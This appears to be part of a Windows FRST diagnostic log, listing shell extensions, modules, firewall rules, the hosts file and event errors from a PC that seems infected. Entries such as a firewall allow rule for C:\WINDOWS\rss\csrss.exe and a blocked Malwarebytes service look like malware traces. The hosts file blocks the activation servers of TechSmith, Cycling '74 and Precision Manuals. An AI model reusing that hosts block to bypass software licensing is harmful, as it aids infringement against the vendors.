ShellIconOverlayIdentifiers-x32: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ContextMenuHandlers1: [AESCrypt] -> {35872D53-3BD4-45FA-8DB5-FFC47D4235E7} => C:\Program Files\AESCrypt\AESCrypt.dll [2015-04-17] (Packetizer, Inc.) [File not signed]
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2018-07-23] (Notepad++ -> )
ContextMenuHandlers1: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers1: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-08-26] (Florian Heidenreich) [File not signed]
ContextMenuHandlers1: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} => C:\Program Files\PDFCreator\PDFCreatorShell.DLL [2017-01-31] (pdfforge GmbH -> pdfforge GmbH)
ContextMenuHandlers1: [PureSync] -> {D1079645-619B-4d0b-8FD5-1008B95134E1} => C:\Program Files (x86)\Jumping Bytes\PureSync\shellext\psshell64.dll [2016-03-03] (Jumping Bytes (Christoph Guentner) -> Jumping Bytes)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-08-26] (Florian Heidenreich) [File not signed]
ContextMenuHandlers2: [PureSync] -> {D1079645-619B-4d0b-8FD5-1008B95134E1} => C:\Program Files (x86)\Jumping Bytes\PureSync\shellext\psshell64.dll [2016-03-03] (Jumping Bytes (Christoph Guentner) -> Jumping Bytes)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-08-26] (Florian Heidenreich) [File not signed]
ContextMenuHandlers4: [PureSync] -> {D1079645-619B-4d0b-8FD5-1008B95134E1} => C:\Program Files (x86)\Jumping Bytes\PureSync\shellext\psshell64.dll [2016-03-03] (Jumping Bytes (Christoph Guentner) -> Jumping Bytes)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => -> No File
ContextMenuHandlers5: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)
==================== Codecs (Whitelisted) ====================
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
Shortcut: C:\Users\SR\Desktop\Traffic Simulator Configuration Tool.lnk -> C:\Program Files (x86)\Traffic Simulator Configuration Tool\TSCT.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maxis\SimCity 4\Traffic Simulator Configuration Tool.lnk -> C:\Program Files (x86)\Traffic Simulator Configuration Tool\TSCT.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH4 Megève\LLH_AlpesNordBP.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\LLH_AlpesNordBP.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH4 Megève\LLH_SUMMER.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\LLH_SUMMER.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH4 Megève\LLH_WINTER.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\LLH_WINTER.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH8X\LLH8X_Summer.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH8X\Scenery\LLH8X_Summer.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH8X\LLH8X_SummerBasePack.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH8X\Scenery\LLH8X_SummerBasePack.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH8X\LLH8X_Winter.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH8X\Scenery\LLH8X_Winter.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH7X\LLH7X_Summer.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH7X\Scenery\LLH7X_Summer.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH7X\LLH7X_SummerBasePack.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH7X\Scenery\LLH7X_SummerBasePack.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH7X\LLH7X_Winter.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH7X\Scenery\LLH7X_Winter.bat ()
==================== Loaded Modules (Whitelisted) =============
2019-11-24 19:12 - 2008-10-15 16:44 - 000205312 _____ () [File not signed] C:\Users\SR\AppData\Local\Temp\is-94DQB.tmp\itdownload.dll
2019-11-24 19:12 - 2019-11-24 19:12 - 000903680 _____ () [File not signed] C:\Users\SR\AppData\Local\Temp\is-FML3U.tmp\Guitar.tmp
2009-02-23 12:28 - 2009-02-23 12:28 - 000013824 _____ (Creative Technology Ltd) [File not signed] C:\Windows\System32\ctagent.DLL
2009-02-23 12:27 - 2009-02-23 12:27 - 000175104 _____ (Creative Technology Ltd) [File not signed] C:\WINDOWS\System32\CTDCIFCE.DLL
2009-02-23 12:16 - 2009-02-23 12:16 - 000067584 _____ (Creative Technology Ltd) [File not signed] C:\WINDOWS\System32\CTDPROXY.DLL
2009-02-23 12:28 - 2009-02-23 12:28 - 000061952 _____ (Creative Technology Ltd) [File not signed] C:\Windows\System32\ctpcmcia.DLL
2009-02-23 12:28 - 2009-02-23 12:28 - 000046592 _____ (Creative Technology Ltd) [File not signed] C:\Windows\System32\ctspkhlp.DLL
2017-08-26 16:54 - 2017-08-26 16:54 - 000410112 _____ (Florian Heidenreich) [File not signed] C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll
2016-12-07 20:44 - 2016-12-07 20:44 - 000373248 _____ (IntelleSoft) [File not signed] C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\BugTrapU-x64.dll
2017-09-29 00:39 - 2017-09-29 00:39 - 000252928 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbPc.DLL
2019-02-18 21:23 - 2019-10-26 22:44 - 000281600 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVFILESYSTEMMETADATA.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000400896 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvApi.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001124864 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000519680 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000836608 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000585008 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVCatalog.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001642800 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000177968 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvStreamingManager.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001010992 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVMANIFEST.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001091888 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVPOLICY.dll
2019-11-24 19:12 - 2016-04-17 19:16 - 000221184 _____ (Mitrich Software) [File not signed] C:\Users\SR\AppData\Local\Temp\is-94DQB.tmp\idp.dll
2015-04-17 17:30 - 2015-04-17 17:30 - 000139264 _____ (Packetizer, Inc.) [File not signed] C:\Program Files\AESCrypt\AESCrypt.dll
2017-05-26 12:29 - 2017-05-26 12:29 - 000116224 _____ (pdfforge GmbH) [File not signed] C:\Windows\System32\pdfcmon.dll
2019-11-24 19:12 - 2017-05-03 11:31 - 000043520 _____ (Vincenzo Giordano) [File not signed] C:\Users\SR\AppData\Local\Temp\is-94DQB.tmp\psvince.dll
==================== Alternate Data Streams (Whitelisted) ========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\ProgramData\TEMP:907E90B1 [246]
AlternateDataStreams: C:\Users\SR\AppData\Local\OPTvJO7k:lSGoicsydMwI75AardtQAZCSFhB [2296]
==================== Safe Mode (Whitelisted) ==================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
==================== Association (Whitelisted) =================
==================== Internet Explorer trusted/restricted ==========
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2015-07-10 13:04 - 2019-06-18 13:33 - 000001666 ____R C:\Windows\system32\drivers\etc\hosts
127.0.0.1 precisionmanuals.com
127.0.0.1 www.precisionmanuals.com
127.0.0.1 license.precisionmanuals.com
127.0.0.1 auth.cycling74.com
127.0.0.1 auth64.cycling74.com
127.0.0.1 www.techsmith.com
127.0.0.1 activation.cloud.techsmith.com
127.0.0.1 oscount.techsmith.com
127.0.0.1 updater.techsmith.com
127.0.0.1 camtasiatudi.techsmith.com
127.0.0.1 tsccloud.cloudapp.net
127.0.0.1 assets.cloud.techsmith.com
127.0.0.1 65.52.240.48
127.0.0.1 oscount.techsmith.com
127.0.0.1 69.167.144.18
127.0.0.1 www.techsmith.com
127.0.0.1 activation.cloud.techsmith.com
127.0.0.1 oscount.techsmith.com
127.0.0.1 updater.techsmith.com
127.0.0.1 camtasiatudi.techsmith.com
127.0.0.1 tsccloud.cloudapp.net
127.0.0.1 assets.cloud.techsmith.com
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> D:\Program Files (x86)\Embarcadero\Studio\19.0\bin;C:\Users\Public\Documents\Embarcadero\Studio\19.0\Bpl;D:\Program Files (x86)\Embarcadero\Studio\19.0\bin64;C:\Users\Public\Documents\Embarcadero\Studio\19.0\Bpl\Win64;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static;C:\Program Files\Microsoft SQL Server\110\Tools\Binn\;C:\Program Files (x86)\GtkSharp\2.12\bin;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files (x86)\QuickTime\QTSystem\;C:\Program Files\NVIDIA Corporation\NVIDIA NvDLISR;C:\Program Files\dotnet\
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg
DNS Servers: 1.1.1.1 - 1.0.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Warn)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
(If an entry is included in the fixlist, it will be removed.)
HKLM\...\StartupApproved\Run: => "AdobeGCInvoker-1.0"
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run: => "Greenshot"
HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run32: => "StartCCC"
HKLM\...\StartupApproved\Run32: => "AsioThk32Reg"
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\StartupApproved\Run: => "Viber"
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [TCP Query User{91AC375A-B6EC-4001-802D-B72C16747E11}C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe] => (Allow) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [UDP Query User{A6F1920D-D88E-48EB-B0AB-6804B6D1752E}C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe] => (Allow) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [{93EDDD15-9B7C-4447-ABAE-501201FF8A61}] => (Block) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [{C3DDABFC-FE5E-4CC3-9C79-344AB623C7DB}] => (Block) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [TCP Query User{BF23CCF8-3722-4E94-BBCD-048D218B58ED}D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe] => (Allow) D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe (RailSimulator T/A Dovetail -> Microsoft Corp.)
FirewallRules: [UDP Query User{CCB1BECF-8668-4A0A-81EA-7482FB3A4DE8}D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe] => (Allow) D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe (RailSimulator T/A Dovetail -> Microsoft Corp.)
FirewallRules: [{F0D42ECE-AF71-4409-A450-E3F863137671}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{5EBA522B-A804-426C-839D-4449D306556A}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{23C98884-7855-4B47-9DCE-7656330C8DFC}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{5D8EC213-3D1D-4722-956F-E0A2CC9E212B}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [TCP Query User{021D1265-3A31-43D0-9520-4E7D81972374}C:\program files\cycling '74\max 7\max.exe] => (Allow) C:\program files\cycling '74\max 7\max.exe (Cycling '74) [File not signed]
FirewallRules: [UDP Query User{C66DEFFE-A5F1-4B7E-A74E-F9368D6D6EC0}C:\program files\cycling '74\max 7\max.exe] => (Allow) C:\program files\cycling '74\max 7\max.exe (Cycling '74) [File not signed]
FirewallRules: [{A8361D34-69CE-446C-9567-9A0EFC8AF75A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{F3D527C7-4F10-47C7-ABC4-820BCD31768B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{486EB322-4CC3-4726-8F83-95DCE3A309AE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{F7124E26-2B62-49EC-8E6B-F2B5F4288ECC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{287425B3-761D-4793-BD0B-39346EA97794}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{629429D6-E5F3-4D9E-87A1-668E6E2578AF}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{09C709D6-BEC4-4FE0-8569-D32BE72EBB20}] => (Allow) LPort=8318
FirewallRules: [{97B5B393-FE3F-4B8E-8BA8-A8FDEE7DF18F}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe () [File not signed]
FirewallRules: [{F13A0E2B-3CE0-497A-A237-A2034F33A8E6}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe () [File not signed]
FirewallRules: [{39B466A5-4C25-4C27-90D2-6CA05D4A0AF4}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{DD68D091-C860-4103-B578-87949E0C39C5}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{3FA6B652-D2F9-43D5-8487-2643470B90D9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{65D7C44B-7B22-436F-81D1-83ED80E67633}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [TCP Query User{EEA7C7A7-33BA-41A2-BE41-1A26259EAD15}D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe] => (Allow) D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe No File
FirewallRules: [UDP Query User{4841B43C-6AEF-4BA9-8382-61909EEA1DE3}D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe] => (Allow) D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe No File
FirewallRules: [{B74858EF-98FA-4A92-81DC-4F17DCAB4DEA}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe (Dropbox, Inc -> Dropbox, Inc.)
FirewallRules: [TCP Query User{D17DCF5C-B1C8-4216-9754-89508AAA6F02}C:\program files\native instruments\native access\addlibrary.exe] => (Allow) C:\program files\native instruments\native access\addlibrary.exe () [File not signed]
FirewallRules: [UDP Query User{59A3E512-E9CB-419C-AB1B-2B0EF51A5B9C}C:\program files\native instruments\native access\addlibrary.exe] => (Allow) C:\program files\native instruments\native access\addlibrary.exe () [File not signed]
FirewallRules: [{EDEA1E3E-A12C-4F24-AFFD-F819C6FC187E}] => (Allow) C:\WINDOWS\rss\csrss.exe () [File not signed]
FirewallRules: [{CB2B1E04-1443-4466-A2D4-6FECE639BD29}] => (Allow) C:\Users\SR\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]
==================== Restore Points =========================
19-11-2019 13:12:33 Scheduled Checkpoint
==================== Faulty Device Manager Devices ============
==================== Event log errors: ========================
Application errors:
==================
Error: (11/24/2019 07:35:57 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.
Error: (11/24/2019 07:12:42 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.
Error: (11/24/2019 07:12:09 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.
Error: (11/24/2019 07:07:44 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.
Error: (11/24/2019 07:07:12 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.
Error: (11/24/2019 07:01:40 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.
Error: (11/24/2019 07:01:07 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.
Error: (11/24/2019 06:57:31 PM) (Source: MsiInstaller) (EventID: 10005) (User: DESKTOP-A0OS1Q6)
Description: Product: Online Application -- Error 4106. An error was encountered while creating a scheduled task: 'Online Application V2G1.job'. Error description: The parameter is incorrect.
System errors:
=============
Error: (11/24/2019 07:14:08 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
Windows.SecurityCenter.WscDataProtection
and APPID
Unavailable
to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
Error: (11/24/2019 07:14:08 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
Windows.SecurityCenter.WscBrokerManager
and APPID
Unavailable
to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
Error: (11/24/2019 07:14:08 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
Windows.SecurityCenter.WscBrokerManager
and APPID
Unavailable
to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
Error: (11/24/2019 07:14:08 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
Windows.SecurityCenter.WscBrokerManager
and APPID
Unavailable
to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
Error: (11/24/2019 07:12:22 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Malwarebytes Service service failed to start due to the following error:
Access is denied.
Error: (11/24/2019 07:12:22 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Malwarebytes Service service failed to start due to the following error:
Access is denied.
